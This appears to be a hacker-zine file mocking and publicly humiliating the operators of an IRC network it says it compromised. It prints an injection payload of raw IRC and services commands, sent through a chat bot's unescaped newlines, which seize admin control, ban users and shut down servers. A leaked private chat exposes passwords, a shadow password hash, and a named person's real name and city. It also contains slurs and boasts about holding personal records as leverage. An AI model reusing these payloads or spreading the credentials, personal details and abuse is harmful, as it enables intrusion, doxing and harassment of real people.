2693 lines
223 KiB
Plaintext
2693 lines
223 KiB
Plaintext
░ ░
|
|
░ ░
|
|
░ FEATURING: "MLT" as THE EX-TEAMP0ISON FEDERAL AGENT ░
|
|
░ "BONGRIP" as THE WEAKEST LINK ░
|
|
░ "DANK" as THE MARDAM-BEY ZERODAY ░
|
|
░ "DIRTY" as EL7 .. WE PROUDLY PRESENT: ░
|
|
░░
|
|
▄▄█████▄ ░░
|
|
▐█▓▀ ▐██▌ ▒▒▒▒▒▒
|
|
█▓▌ ██▓ ██▓ █████▓▓
|
|
▄▄▄▄▄███▄████████▄ ██▄ ███████
|
|
▄██▀▀▀▀ █▀███▓ ▀███▌ ██▓ ▀▀██▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄████████████████████████
|
|
██▌ █░████ ▄███████▓███▄▄▄▄▄▄███▄ ▀███████████████████████████████████████
|
|
█▓▌ █▒██▀██████▀ ███ ██ ▀▀████▀▀▀▀▀▀▀▀▀▀ ▀▀▀███
|
|
█▓▌ ▐█▓██░█▀▀ █▀█ ▓▓ apT-28 NF0 ██▐
|
|
██▄▌ ▄███▌█▒█ ▄ █░█ ▄ ▒▒ yOUr eNt3r741nm3nt 4or t0d4Y: ▐
|
|
▀███████▓▀ █▓█ ▐ ▄ █▒█ ▄██ ▌ ░░
|
|
▀▀▀▀▀▀ ███ █ ▌ █▓█ ▐█▓ ▐▌ #Insecurity ░░
|
|
█▄▄▄▄▄▄▄▄▌ ██▓ ▄██ ▌▄ ███▄ ▄██▌ ▐█ ░░ irc.insecurity.zone ▒▒
|
|
██████████▄▄▄▄▄██████▄ ▀██████▀ ▄██ ▒▒ ▓▓
|
|
███████████████████████▄▄▄▄▄▄▄▄████ ▓▓▄ ██
|
|
███████████████████████████████████████████████████████████████████████████████
|
|
█████████
|
|
█████████
|
|
█▀▀▀▀▀▀▀▀
|
|
█ ▐████▌ ▄██▄ ████▄ ██ ▄███ ▄███▄ █▌ ▐█▐█ ▐█▌ ▄██▄ ▄█▀█▄ ▄███
|
|
█▄▄ ██ ████ ██▌██▌ ██ ██ ▄▄▄ ▄▄▄ ██ ██ █▌ ▐█▐██▐█▌ ████ ██ ██ ██
|
|
███ ██ ██▐█▌ ████▀ ██ ███ █ █ █▄▄ ██/██ █▌▐▌▐█▐████▌▐██▐█▌ ██ ▄▄▄ ███
|
|
███ ██ ▐█████ ██▌██▌ ██ ██ █▄█ █ ██ ██ █▌▐▌▐█▐█▌██▌▐█████ ██ ▀█▀ ██
|
|
███ ██ ██▌ ██ █████▀ █████ ▀███ ▀███▀ ▀████▀▐█▌ █▌██▌ ██ ▀███▀ ▀███
|
|
███▄▄▄▐▄▄
|
|
█████████
|
|
█████████
|
|
█████████ 0x00: Intro
|
|
█████████ 0x01: The Tales of Khaled Mardam-Bey
|
|
█████████ 0x02: The Impostor
|
|
█████████ 0x03: Hook, O:Lines, and Sinker
|
|
█████████ 0x04: Pass the hash
|
|
█████████ 0x05: A flaw in MD5
|
|
█████████ 0x06: MD5pedia
|
|
█████████ 0x07: Clash of the hashes
|
|
█████████ 0x08: Recommended reading
|
|
█████████ 0x09: Attachments
|
|
█████████ 0x0A: Contact
|
|
█████████ 0x0B: Greetings
|
|
█████████
|
|
█████████
|
|
█████████
|
|
███████████████████████████████████████████████████████████████████████████████
|
|
███▓▓▓▒▒▒░░░ 0x00 Intro ███
|
|
███████████████████████████████████████████████████████████████████████████████
|
|
█░░
|
|
█░
|
|
█░ Dobra evening, Komrades,
|
|
█
|
|
█ Is slow day at Яussian ENERGETICBEAR HQ. We notice script kiddie honeypot
|
|
█ and decide to have fun. I turn to Vlad and get him to fire up ICQ to kontact
|
|
█ our network of sleeper agents across world. Is not long and we having Dmitry
|
|
█ and Sergey ready to attack network (is named "Insecurity", haha are
|
|
█ Americans of realizing irony in this)? Upon joining, we see nearly 100
|
|
█ capitalist Блядь, some klaiming to be in ~el8. They not realizing we zf0,
|
|
█ but we sneak in through front door as APT and compromise their IRC. They
|
|
█ give us password hashes, is easier than SCADA system хихихихихи. Go get
|
|
█ your glass of Kvass and get ready, vis story is only beginning.
|
|
█
|
|
█ Oh Спасибо for asking to be 0wned, we thoroughly enjoyed this.
|
|
█
|
|
███████████████████████████████████████████████████████████████████████████████
|
|
███▓▓▓▒▒▒░░░ 0x01 The Tales of Khaled Mardam-Bey ███
|
|
███████████████████████████████████████████████████████████████████████████████
|
|
█░░
|
|
█░
|
|
█░ Typically skid having MIRC bot because languages are too difficult. So we
|
|
█ watched users interact with the bot and it have command for "Urban
|
|
█ Dictionary" among others. They do not strip newlines from many of the
|
|
█ command replies, basic protocol for all bot (we see this passively, someone
|
|
█ sends Urban Dictionary command and it truncates on the newline). So we
|
|
█ having OPER and services admin on their IRC (they giving the bot this
|
|
█ power, of course), as well as RCE on the bot through access to other
|
|
█ command. However we having our sights set on something far greater..
|
|
█
|
|
█ Side notes: #research being their priv8 channel and #noc is their IP
|
|
█ logging channel. danK is the MIRC bot.
|
|
█
|
|
█ After we getting Urban Dictionary entries approved we laughing over водка.
|
|
█ Now we send command to restore glory to disgusting skid IRC:
|
|
█
|
|
█ <zf0> .ud priv8
|
|
█ <danK> (Urban Dictionary) priv8: Very secure. Example: so priv8, jk
|
|
█ PRIVMSG ChanServ :AKICK #noc ADD MLT /dev/null
|
|
█ PRIVMSG ChanServ :AKICK #noc ADD *@* /dev/null
|
|
█ PRIVMSG OperServ :SAJOIN zf0 #research
|
|
█ PRIVMSG OperServ :SAJOIN zf0 #insecurity
|
|
█ SAJOIN zf0 #research
|
|
█ -!- zf0 [zf0@privacy.internetz.me-50310034.dfri.se] has joined #research
|
|
█ SAMODE #research +havoq zf0 zf0 zf0 zf0 zf0
|
|
█ -!- ServerMode/#research [+havoq zf0 zf0 zf0 zf0 zf0] by superb.undernix.net
|
|
█ PRIVMSG ChanServ :ACCESS #insecurity ADD zf0 SOP
|
|
█ PRIVMSG ChanServ :ACCESS #research ADD zf0 SOP
|
|
█ GLOBAL T1m3 to rM s0m3 sk1ds, n3tw0rk m41nt3n4nc3
|
|
█ PRIVMSG OperServ :SET SUPERADMIN ON
|
|
█ PRIVMSG OperServ :SEEN CLEAR
|
|
█ PRIVMSG OperServ :SEEN CLEAR 6w
|
|
█ PRIVMSG OperServ :FORBID ADD MLT :skid lord
|
|
█ PRIVMSG OperServ :OPERNEWS ADD WE GOT HACKED
|
|
█ PRIVMSG OperServ :GLOBAL T1m3 to rM s0m3 sk1ds, n3tw0rk m41nt3n4nc3
|
|
█ PRIVMSG Global :GLOBAL T1m3 to rM s0m3 sk1ds, n3tw0rk m41nt3n4nc3
|
|
█ -Global(services@undernix.net)- T1m3 to rM s0m3 sk1ds, n3tw0rk m41nt3n4nc3
|
|
█ PRIVMSG ChanServ :TOPIC #insecurity y0ur d41ly s0urc3 0f wh1t3h4t | security
|
|
█ experts | phR13ndlY pSA: MLT is a F3d && anyone wh0 K1aims t0 be in el8 is a
|
|
█ sk1d
|
|
█ -!- JewOven changed the topic of #insecurity to: y0ur d41ly s0urc3 0f wh1t3h
|
|
█ 4t | security experts | phR13ndlY pSA: MLT is a F3d && anyone wh0 K1aims t0
|
|
█ be in el8 is a sk1d
|
|
█ TOPIC #insecurity :y0ur d41ly s0urc3 0f wh1t3h4t | security experts | phR13n
|
|
█ dlY pSA: MLT is a F3d && anyone wh0 K1aims t0 be in el8 is a sk1d
|
|
█ -!- danK changed the topic of #insecurity to: y0ur d41ly s0urc3 0f wh1t3h4t
|
|
█ | security experts | phR13ndlY pSA: MLT is a F3d && anyone wh0 K1aims t0 be
|
|
█ in el8 is a sk1d
|
|
█ MODE #insecurity +havoq zf0 zf0 zf0 zf0 zf0
|
|
█ SAMODE #insecurity +havoq zf0 zf0 zf0 zf0 zf0
|
|
█ SAMODE #insecurity +blLeI *!*@* 1 #ppriv ~r:*unbannable irc* ~r:*god*
|
|
█ -!- ServerMode/#insecurity [+b *!*@*] by superb.undernix.net
|
|
█ MODE #insecurity +blLeI *!*@* 1 #ppriv ~r:*unbannable irc* ~r:*god*
|
|
█ -!- mode/#insecurity [+lbLeI 1 *!*@* #ppriv ~r:*unbannable irc*!*@*] by danK
|
|
█ TOPIC #research :th1s ch4nn3l 1z imp3netrable. l1k3 0ur v1rg1n1ty
|
|
█ -!- danK changed the topic of #research to: th1s ch4nn3l 1z imp3netrable. l1
|
|
█ k3 0ur v1rg1n1ty
|
|
█ SAMODE #research +k l4m3rs
|
|
█ MODE #research +k l4m3rs
|
|
█ -!- mode/#research [+k l4m3rs] by danK
|
|
█ SAMODE #noc -O
|
|
█ MODE #noc -O
|
|
█ <zf0> .ud priv9
|
|
█ <danK> (Urban Dictionary) priv9: Ultra secure, like MD5 Example: Whoa thats
|
|
█ priv9? Is that the darknet?
|
|
█ PRIVMSG #insecurity :MESS
|
|
█ PRIVMSG #insecurity :WITH
|
|
█ PRIVMSG #insecurity :THE
|
|
█ PRIVMSG #insecurity :BEST
|
|
█ PRIVMSG #insecurity :DIE
|
|
█ PRIVMSG #insecurity :LIKE
|
|
█ PRIVMSG #insecurity :THE
|
|
█ PRIVMSG #insecurity :REST
|
|
█ GZLINE MLT 0 :ch13f phed3ral ag3nt
|
|
█ GZLINE RMS 0 :rip
|
|
█ * RMS has quit (Z:lined (rip))
|
|
█ GZLINE sxcurity 0 :rip
|
|
█ * sxcurity has quit (Z:lined (rip))
|
|
█ GZLINE FuZi0N 0 :rip
|
|
█ * FuZi0N has quit (Z:lined (rip))
|
|
█ GZLINE sp00n 0 :rip
|
|
█ * sp00n has quit (Z:lined (rip))
|
|
█ GZLINE syn4pse 0 :rip
|
|
█ * sup has quit (Z:lined (rip))
|
|
█ * dab has quit (Z:lined (rip))
|
|
█ * Zodiac has quit (Z:lined (rip))
|
|
█ * dkb has quit (Z:lined (rip))
|
|
█ * loeken has quit (Z:lined (rip))
|
|
█ * syn4pse has quit (Z:lined (rip))
|
|
█ GZLINE Alyssa 0 :rip
|
|
█ * Alyssa has quit (Z:lined (rip))
|
|
█ GZLINE chloe 0 :rip
|
|
█ GZLINE komodo 0 :rip
|
|
█ * dab has quit (Z:lined (rip))
|
|
█ KILL lola :rip
|
|
█ * lola has quit (Killed (danK (rip)))
|
|
█ KILL elitedan1erous :rip
|
|
█ KILL e :rip
|
|
█ KILL Nux :rip
|
|
█ * Nux has quit (Killed (danK (rip)))
|
|
█ PRIVMSG OperServ :KILL dirty niggers123
|
|
█ KILL dirty :niggers123
|
|
█ PRIVMSG OperServ :KILL bongrip i write rootkits so i know if my irc can get
|
|
█ hacked
|
|
█ KILL bongrip 0 :i write rootkits so i know if my irc can get hacked
|
|
█ PRIVMSG ChanServ :AKICK #insecurity ADD MLT :w3lc0m3 b4q
|
|
█ PRIVMSG ChanServ :AKICK #insecurity ADD bongrip :w3lc0m3 b4q
|
|
█ PRIVMSG ChanServ :DROP #research #research
|
|
█ * ChanServ sets mode -r on #research
|
|
█ PRIVMSG ChanServ :DROP #noc #noc
|
|
█ PRIVMSG BotServ :BOT ADD MLT ci192 vpn02.fbi.gov :skid lord
|
|
█ DIE die
|
|
█ -!- Netsplit <-> superb.undernix.net
|
|
█ PRIVMSG OperServ :NOOP SET superb.underunix.net
|
|
█ PRIVMSG OperServ :NOOP SET aussie.insecurity.zone
|
|
█ PRIVMSG OperServ :NOOP SET fsociety.internetz.me
|
|
█
|
|
█ b0ngr1p vS. [zf0]danK:
|
|
█ -!- bongrip [rip@undernix.net] has quit [[superb.undernix.net] Local kill by
|
|
█ danK (That shit outta here, bitch.)]
|
|
█ -!- danK was kicked from #insecurity by bongrip [Don't ban me :)]
|
|
█ -!- mode/#insecurity [-ob danK *!*@*] by bongrip
|
|
█ -!- bongrip was kicked from #insecurity by danK [That shit outta here.]
|
|
█ -!- mode/#insecurity [+b *!rip@undernix.net] by danK
|
|
█ -!- mode/#insecurity [+b bongrip!*rip@undernix.net] by danK
|
|
█ -!- mode/#insecurity [-b *!rip@undernix.net] by bongrip
|
|
█ -!- mode/#insecurity [+b *!POTENT@undernix.net] by bongrip
|
|
█
|
|
█ Pigdog imperialist skidswine so confused and scared they reinstall services.
|
|
█ They deciding services being beyond repair and starting over. Which meaning
|
|
█ we can impersonate anyone. So why not become the leader of the network?
|
|
█
|
|
█
|
|
███████████████████████████████████████████████████████████████████████████████
|
|
███▓▓▓▒▒▒░░░ 0x02 The Imposter ███
|
|
███████████████████████████████████████████████████████████████████████████████
|
|
█░░
|
|
█░
|
|
█░ Now Dmitry is funny guy, he thinking we can trick them by simply changing
|
|
█ our nickname to the one they call MLT. I say no, Americans are not vhat
|
|
█ stupid. I change nick, from zf0 to MLT. I get private message asking me
|
|
█ what is going on, how core members are leaving. I could not believe vey
|
|
█ could be this oblivious. I ask one admin "can you change my admin password
|
|
█ comrade". He does so. Vladmir says to ask him for a hash from /etc/shadow.
|
|
█ They give it to us. Vut the fuck!?
|
|
█
|
|
█ PM with bongrip:
|
|
█ <bongrip> yea
|
|
█ <bongrip> are u on aussie server
|
|
█ <MLT> I am
|
|
█ <bongrip> ya everything works for me
|
|
█ <bongrip> ur stuff is still the same
|
|
█ <bongrip> im just trying to get
|
|
█ <bongrip> services
|
|
█ <bongrip> going
|
|
█ <bongrip> i can oper but
|
|
█ <bongrip> i cant link db's
|
|
█ <bongrip> they killed the ircd
|
|
█ <bongrip> send cmds to kill it
|
|
█ <bongrip> lol
|
|
█ <MLT> We need to lock this down, I'm getting password denied on my OPER cred
|
|
█ entials
|
|
█ <bongrip> its not from them hacking
|
|
█ <bongrip> or anything
|
|
█ <bongrip> they just used sendraw on teh bot dude
|
|
█ <bongrip> really not anything special ive done that before
|
|
█ <bongrip> but u know waht i did
|
|
█ <bongrip> i used
|
|
█ <bongrip> run /cmd.exe ftp getmybinary
|
|
█ <bongrip> they could have
|
|
█ <bongrip> really fucked me up
|
|
█ <bongrip> if htey were smart
|
|
█ <bongrip> but they arent
|
|
█ <bongrip> they took time into those cmds too
|
|
█ <bongrip> its really sad they dont know how powerful it is
|
|
█ <bongrip> they could have tkaen over
|
|
█ <bongrip> my rdp
|
|
█ <bongrip> and
|
|
█ <bongrip> OFFICIALLY
|
|
█ <bongrip> said they reallly hacked me
|
|
█ <bongrip> and taken voer
|
|
█ <bongrip> the entire server
|
|
█ <bongrip> from mirc gui via rdp
|
|
█ <MLT> shit
|
|
█ <bongrip> dont give them any ideas
|
|
█ <bongrip> but nothing else
|
|
█ <bongrip> is like that
|
|
█ <bongrip> i checked all the cmds they ran
|
|
█ <bongrip> nothing crucial
|
|
█ <bongrip> they killed everything off too soon
|
|
█ <bongrip> they killed it instantly and made mistakes
|
|
█ <MLT> i'm on my phone right now, change my public key in authorized_keys, th
|
|
█ ey may have my id_rsa
|
|
█ <MLT> talking with this faggot
|
|
█ <bongrip> nah
|
|
█ <bongrip> nobody has anything
|
|
█ <bongrip> they didnt get into any servers
|
|
█ <bongrip> all they did was send that one cmd
|
|
█ <bongrip> thru urban dictionary
|
|
█ <bongrip> thru the bot
|
|
█ <bongrip> with sendraw
|
|
█ <MLT> i'm looking at my id_rsa key, it was a distraction
|
|
█ <MLT> fuck
|
|
█ <MLT> change the keys and passwords and run rkhunter
|
|
█ <bongrip> bro nothing is on there
|
|
█ <bongrip> on anything
|
|
█ <bongrip> lol
|
|
█ <bongrip> are you sure man?
|
|
█ <MLT> did you run rkhunter?
|
|
█ <bongrip> no
|
|
█ <bongrip> but i dont have to
|
|
█ <bongrip> i know they didnt get into any boxes
|
|
█ <MLT> yes i'm literally positive
|
|
█ <bongrip> positive of what
|
|
█ <MLT> there is a rootkit on the box RIGHT NOW
|
|
█ -Global- Services are now back online - have a nice day
|
|
█ <bongrip> r ru srs
|
|
█ <bongrip> on ur box?
|
|
█ <bongrip> i didnt even look at ur box
|
|
█ <bongrip> im looking at mine to make sure everything else is good
|
|
█ <bongrip> u had root open u told me u were gonna secure ur box
|
|
█ <bongrip> u told me to just setup ircd shit
|
|
█ <bongrip> and u were gonna secure it
|
|
█ <bongrip> and how do u know theres a rootkit
|
|
█ <bongrip> on the box
|
|
█ <MLT> they pasted part of /etc/shadow
|
|
█ <bongrip> damn
|
|
█ <bongrip> they must have got in ur box
|
|
█ <MLT> that's what i've been saying
|
|
█ <bongrip> ive they have those hashes
|
|
█ <bongrip> man
|
|
█ <bongrip> i think green is helping them
|
|
█ <bongrip> but
|
|
█ <MLT> i'm about to get back, PLEASE change the pws
|
|
█ <bongrip> someone doesnt know irc too well and windows
|
|
█ <bongrip> bro
|
|
█ <bongrip> rm -rf that shit
|
|
█ <bongrip> lol
|
|
█ <bongrip> and this time
|
|
█ <MLT> i will i just need to back up some files
|
|
█ <bongrip> ill lock the box down
|
|
█ <bongrip> root was open
|
|
█ <bongrip> it coulda been bruted tbh
|
|
█ <bongrip> i didnt even configure jail.conf
|
|
█ <bongrip> nothing was ready
|
|
█ <bongrip> on that box
|
|
█ <bongrip> u told me not to
|
|
█ <bongrip> lol
|
|
█ <MLT> nothing? ok
|
|
█ <bongrip> bro there was 0 security
|
|
█ <bongrip> on that box
|
|
█ <bongrip> literally
|
|
█ <bongrip> u told me to setup the ircd
|
|
█ <bongrip> and that u were gonna put keys on theree
|
|
█ <bongrip> and lock it down
|
|
█ <MLT> i'm going to add a new user that can run rkhunter on my boxes, the pas
|
|
█ sword is going to be XbW9_AZaCr+zEX
|
|
█ <MLT> i can disable Root login for the ssh
|
|
█ <bongrip> just use keys
|
|
█ <bongrip> and disable root no matter what
|
|
█ <bongrip> they cant guess user/pass
|
|
█ <bongrip> but root/pass
|
|
█ <bongrip> yes
|
|
█ <bongrip> all day long
|
|
█ <bongrip> i can crack a lot of those hashes in my head now
|
|
█ <bongrip> it all starts to mesh together
|
|
█ <bongrip> especially wasnt it like
|
|
█ <bongrip> 8 chars
|
|
█ <bongrip> the pw
|
|
█ <bongrip> im sure they had processing power to crack that
|
|
█ <bongrip> bruted the fuck out of it
|
|
█ <bongrip> but weird thing
|
|
█ <bongrip> lola is in the channel
|
|
█ <bongrip> that they did this shit in
|
|
█ <bongrip> i wanna know how the bot joined #help in the first place
|
|
█ <MLT> do you think lola is in on it?
|
|
█ <bongrip> and why
|
|
█ <bongrip> lola
|
|
█ <bongrip> and
|
|
█ <bongrip> zf0
|
|
█ <bongrip> were in there
|
|
█ <bongrip> alone
|
|
█ <bongrip> lola didnt say anything
|
|
█ <bongrip> but
|
|
█ <bongrip> somethings up
|
|
█ <MLT> wtf
|
|
█ <bongrip> he was in #help
|
|
█ <bongrip> out of nowhere
|
|
█ <bongrip> with just
|
|
█ <bongrip> my bot
|
|
█ <bongrip> zf0
|
|
█ <bongrip> and lola
|
|
█ <bongrip> while zf0 was running those cmds
|
|
█ <bongrip> btw u got hacked by some guys from 2600
|
|
█ <bongrip> i think xt did that
|
|
█ <bongrip> jihad couldnt have done that
|
|
█ <MLT> god damn it, we need to do a full password reset to be safe
|
|
█ <MLT> mind changing @insecurity?
|
|
█ <MLT> i'll remove the password for root and only use keyauth
|
|
█ <bongrip> did u reset the box
|
|
█ <bongrip> reinstall everything
|
|
█ <bongrip> illl have to scrub the hashes off
|
|
█ <bongrip> of the confs
|
|
█ <bongrip> and add new pw's
|
|
█ <bongrip> its just that one box
|
|
█ <bongrip> and they may not even have root
|
|
█ <bongrip> idk man
|
|
█ <bongrip> lol
|
|
█ <bongrip> need to reinstall the box tbh
|
|
█ <bongrip> ill run a quick install
|
|
█ <bongrip> of ircd
|
|
█ <bongrip> in seconds
|
|
█ <MLT> ok
|
|
█ <bongrip> save the .conf file
|
|
█ <MLT> thanks
|
|
█ <bongrip> gimme new pw when u do it
|
|
█ <bongrip> and
|
|
█ <bongrip> well
|
|
█ <bongrip> actually since they can read logs rn
|
|
█ <bongrip> dont give me anything here
|
|
█ <bongrip> lol
|
|
█ <bongrip> cause ur box is a hub
|
|
█ <bongrip> they could read these pm's rn if ur really kitted
|
|
█ <bongrip> thru pcaps
|
|
█ <MLT> i'm using ssl
|
|
█ <bongrip> its not valid
|
|
█ <bongrip> they can be stripping that
|
|
█ <bongrip> its not a valid cert
|
|
█ <bongrip> its almost the equivalent of putting a very known, easily exploita
|
|
█ ble lock on your front door
|
|
█ <bongrip> and expect someone not to break in
|
|
█ <MLT> well if we are going to rotate the conf anyway i need a temp oper real
|
|
█ quick, still mobile
|
|
█ <bongrip> u should have oper
|
|
█ <bongrip> nothing changed
|
|
█ <MLT> hang on i'm kicking zf0
|
|
█ <bongrip> lemme get into box again
|
|
█ <MLT> they probably changed my oper pass with jihad's
|
|
█ <bongrip> doubt it
|
|
█ <bongrip> they'd be doing a lot more damage rn
|
|
█ <bongrip> gimme a pw
|
|
█ <bongrip> i still dont think
|
|
█ <bongrip> ur hacked bro
|
|
█ <bongrip> im in the box
|
|
█ <bongrip> gimme a pw to hash tho
|
|
█ <MLT> @7fdVrQG@$?h
|
|
█ <bongrip> done
|
|
█ <bongrip> try opering
|
|
█ <MLT> that one worked
|
|
█ <bongrip> can u give me
|
|
█ <bongrip> the etc/shadow
|
|
█ <bongrip> plz
|
|
█ <bongrip> theres only
|
|
█ <bongrip> 1 user
|
|
█ <bongrip> in shadow
|
|
█ <bongrip> if they pasted u the bottom
|
|
█ <bongrip> then they pasted you
|
|
█ <bongrip> ins3circd
|
|
█ <bongrip> ???
|
|
█ <bongrip> this long ass hash?
|
|
█ <bongrip> ins3circd:$6$3Ip4HnTD$c3Nt3o0hKzUf6Xu.mS/rTANN91PSS2043GNn6I.gO5Jx
|
|
█ U5BXFjC5L8uV9D4nb0OJxIlCJwnacwxiyYKOmXm.5/:17306:0:99999:7:::
|
|
█ <bongrip> i doubt that man
|
|
█ <bongrip> if they didnt paste u that
|
|
█ <bongrip> they dont have shit
|
|
█ <bongrip> or at least root hash
|
|
█ <bongrip> hurry and tell me if they pasted that
|
|
█ <bongrip> to u
|
|
█ <bongrip> mlt
|
|
█ <MLT> back
|
|
█ <MLT> that's the one
|
|
█ <bongrip> they did paste that?
|
|
█ <MLT> yea
|
|
█ <bongrip> erh
|
|
█ <MLT> i don't think they can bruteforce it
|
|
█ <bongrip> yea i think they just got hash bro
|
|
█ <bongrip> not anything else
|
|
█ <bongrip> if they were in
|
|
█ <bongrip> id see them
|
|
█ <bongrip> i just ran every active connection
|
|
█ <bongrip> on this box
|
|
█ <bongrip> its everyone on irc
|
|
█ <bongrip> and me
|
|
█ <bongrip> this thing isnt going anywhere i/o
|
|
█ <bongrip> but
|
|
█ <bongrip> guaranteed if they had axx
|
|
█ <bongrip> to that unrealircd.conf
|
|
█ <bongrip> they would have opered themselves
|
|
█ <bongrip> dont u think
|
|
█ <bongrip> rather than run a stupid exploit thru the bot
|
|
█ <bongrip> that coulda really done damage
|
|
█ <bongrip> if they knew what they were doing
|
|
█ <bongrip> literally that was their gateway
|
|
█ <bongrip> to completely own us
|
|
█ <MLT> unless it was a distraction
|
|
█ <bongrip> i wasnt even looking in #help
|
|
█ <bongrip> nah
|
|
█ <bongrip> therea re people trying to hack us
|
|
█ <bongrip> for sure
|
|
█ <bongrip> so
|
|
█ <bongrip> we need to use keys
|
|
█ <bongrip> and ip's bound
|
|
█ <bongrip> to get into our boxes
|
|
█ <bongrip> so not only do u need the key
|
|
█ <bongrip> u need to be on a certain ip
|
|
█ <bongrip> its what syn4pse does
|
|
█ <MLT> true
|
|
█ <bongrip> its what everyone does
|
|
█ <bongrip> we're just lazy
|
|
█ <bongrip> and as 'insecurity'
|
|
█ <bongrip> we cant be that
|
|
█ <bongrip> and we cant let them in this box
|
|
█ <bongrip> lets just format it and call it a day cause they only have /etc/sh
|
|
█ adow and /etc/passwd
|
|
█ <bongrip> im sure
|
|
█ <bongrip> cause like literally what insecurity stands for
|
|
█ <bongrip> is not being lazy
|
|
█ <bongrip> and setting shit up
|
|
█ <bongrip> and not getting owned
|
|
█ <bongrip> lol
|
|
█ <bongrip> we just showed ppl we are just as lazy
|
|
█ <bongrip> who did it
|
|
█ <bongrip> like
|
|
█ <bongrip> i know it was 2600 guys
|
|
█ <bongrip> but whos talking to u
|
|
█ <bongrip> that showed u that hash
|
|
█ <MLT> someone i know, i'm trying to get more information out of them
|
|
█ <MLT> its a user on efnet
|
|
█ <bongrip> i already know its efnet lol
|
|
█ <bongrip> its 2600 guys bc u started that war with jihad
|
|
█ <bongrip> hes actually got connnections to guys who can do shit like xt
|
|
█ <bongrip> granted how much shit i talk about xt
|
|
█ <bongrip> hes actually good at shit
|
|
█ <bongrip> but if ur really rooted
|
|
█ <bongrip> xt is behind that
|
|
█ <bongrip> but ur not
|
|
█ <MLT> we need to get full dox on xt
|
|
█ <bongrip> brandon edwards
|
|
█ <bongrip> st louis, missouri
|
|
█ <bongrip> lol
|
|
█ <bongrip> i doxed a lot of el8
|
|
█ <bongrip> b4 i left
|
|
█ <bongrip> bandit can pull dox by ip
|
|
█ <bongrip> for certain companies
|
|
█ <bongrip> USA
|
|
█ <bongrip> like comcast, cox, charter, etc
|
|
█ <bongrip> he had access to all of it
|
|
█ <bongrip> he doxed like 6 guys for me
|
|
█ <bongrip> all el8 members
|
|
█ <bongrip> he didnt know that tho
|
|
█ <bongrip> lol
|
|
█ <bongrip> 8)
|
|
█ <bongrip> also
|
|
█ <bongrip> this is in relation
|
|
█ <bongrip> to xt
|
|
█ <bongrip> my ex
|
|
█ <bongrip> dated him
|
|
█ <bongrip> like a long time ago
|
|
█ <bongrip> and got drugs from him
|
|
█ <bongrip> and still talks to him
|
|
█ <bongrip> 24/7
|
|
█ <bongrip> ive got her doxed to her teeth
|
|
█ <bongrip> ive got ssn and everything
|
|
█ <bongrip> she's on his fb
|
|
█ <bongrip> to get more updated (address) on him
|
|
█ <bongrip> and if thats going on its not good
|
|
█ <bongrip> cause im sure xt could dox me
|
|
█ <bongrip> thru my ex
|
|
█ <bongrip> but wont bc of her
|
|
█ <bongrip> so i gotta hold her dox
|
|
█ <bongrip> as lleverage
|
|
█ <bongrip> fuck man this shits turning into politics
|
|
█ <MLT> i know man
|
|
█ <bongrip> like literally
|
|
█ <bongrip> i have a bunch of shit
|
|
█ <bongrip> on random people
|
|
█ <bongrip> thats why im not doxed
|
|
█ <bongrip> they know ill sperg out and drop like 50 dox's
|
|
█ <bongrip> a few people know what i have
|
|
█ <bongrip> thats why they hold back
|
|
█ <bongrip> theresr so many spots and positions im in like that
|
|
█ <bongrip> where they have some of my info
|
|
█ <bongrip> maybe even more
|
|
█ <bongrip> i can say this tho stay clean
|
|
█ <bongrip> keep box clean
|
|
█ <bongrip> i got a feeling they r coming on false info
|
|
█ <bongrip> green came to me
|
|
█ <bongrip> and talked real srs
|
|
█ <bongrip> like feds were comin
|
|
█ <bongrip> for some reason
|
|
█ <bongrip> idk why he was actin like that
|
|
█ <bongrip> but he said
|
|
█ <bongrip> supernets is basically like bluehell
|
|
█ <bongrip> its one big honeypot
|
|
█ <MLT> i'm in their payload
|
|
█ <MLT> * i'm looking at their payload
|
|
█ <MLT> it runs 'gzline' on a lot of people including me
|
|
█ <MLT> and then when it gets to lola it just runs KILL
|
|
█ <MLT> it does the same thing for elitedangerous, e, and Nux
|
|
█ <bongrip> its just sendraw man
|
|
█ <bongrip> i already showed it to u
|
|
█ <bongrip> u can urbandictionary 'priv9'
|
|
█ <bongrip> i told u they went thru the bot
|
|
█ <bongrip> i wouldnt really call that a payload
|
|
█ <bongrip> but yea if someone has root
|
|
█ <bongrip> ppl dont just pop up with root like that
|
|
█ <bongrip> if they have /etc/shadow
|
|
█ <bongrip> i really think it was inside job
|
|
█ <bongrip> w/ the etc/shadow
|
|
█ <bongrip> cause they could have added themselves
|
|
█ <bongrip> in the oper conf
|
|
█ <bongrip> why would they go thru dank
|
|
█ <bongrip> and use sendraw
|
|
█ <bongrip> this was him
|
|
█ <bongrip> testing
|
|
█ <bongrip> http://www.urbandictionary.com/define.php?term=priv7
|
|
█ <bongrip> and again
|
|
█ <bongrip> http://www.urbandictionary.com/define.php?term=priv8
|
|
█ <bongrip> MLT
|
|
█ <bongrip> get lola
|
|
█ <bongrip> to paste u all the cmds
|
|
█ <bongrip> zf0 put in #help
|
|
█ <bongrip> so i can see what they all ran
|
|
█
|
|
█ <bongrip> yea i think they just got hash bro
|
|
█
|
|
█ After this, bongrip changed the hash and secured the network.
|
|
█
|
|
█
|
|
█ THE END
|
|
█
|
|
█
|
|
▓
|
|
▒
|
|
░
|
|
|
|
...
|
|
|
|
░
|
|
▒
|
|
▓
|
|
█
|
|
█ h4h4h4h4h4h4
|
|
█ Is joke, yes? Is funny because stupidity flow like radioactive river here.
|
|
█
|
|
█
|
|
███████████████████████████████████████████████████████████████████████████████
|
|
███▓▓▓▒▒▒░░░ 0x03 Hook, O:Lines, and Sinker ███
|
|
███████████████████████████████████████████████████████████████████████████████
|
|
█░░
|
|
█░
|
|
█░ 1st s0me 1nf4llabl3 logiq:
|
|
█
|
|
█ bongrip PRIVMSG #insecurity :if we got hacked
|
|
█ bongrip PRIVMSG #insecurity :we wouldnt be told
|
|
█ bongrip PRIVMSG #insecurity :i constantly have to check shit
|
|
█ bongrip PRIVMSG #insecurity :if we get hacked by these guys we wont know it
|
|
█ bongrip PRIVMSG #insecurity :htey arent going to brag
|
|
█ bongrip PRIVMSG #insecurity :until i check it and find it
|
|
█ bongrip PRIVMSG #insecurity :one day
|
|
█ YogSotho PRIVMSG #insecurity :Indeed. U notice only when they rm ur box
|
|
█ bongrip PRIVMSG #insecurity :which will never happen
|
|
█ bongrip PRIVMSG #insecurity :cause nothing is popped
|
|
█ bongrip PRIVMSG #insecurity :no
|
|
█ bongrip PRIVMSG #insecurity :they wont rm me
|
|
█ bongrip PRIVMSG #insecurity :they would just do it to log
|
|
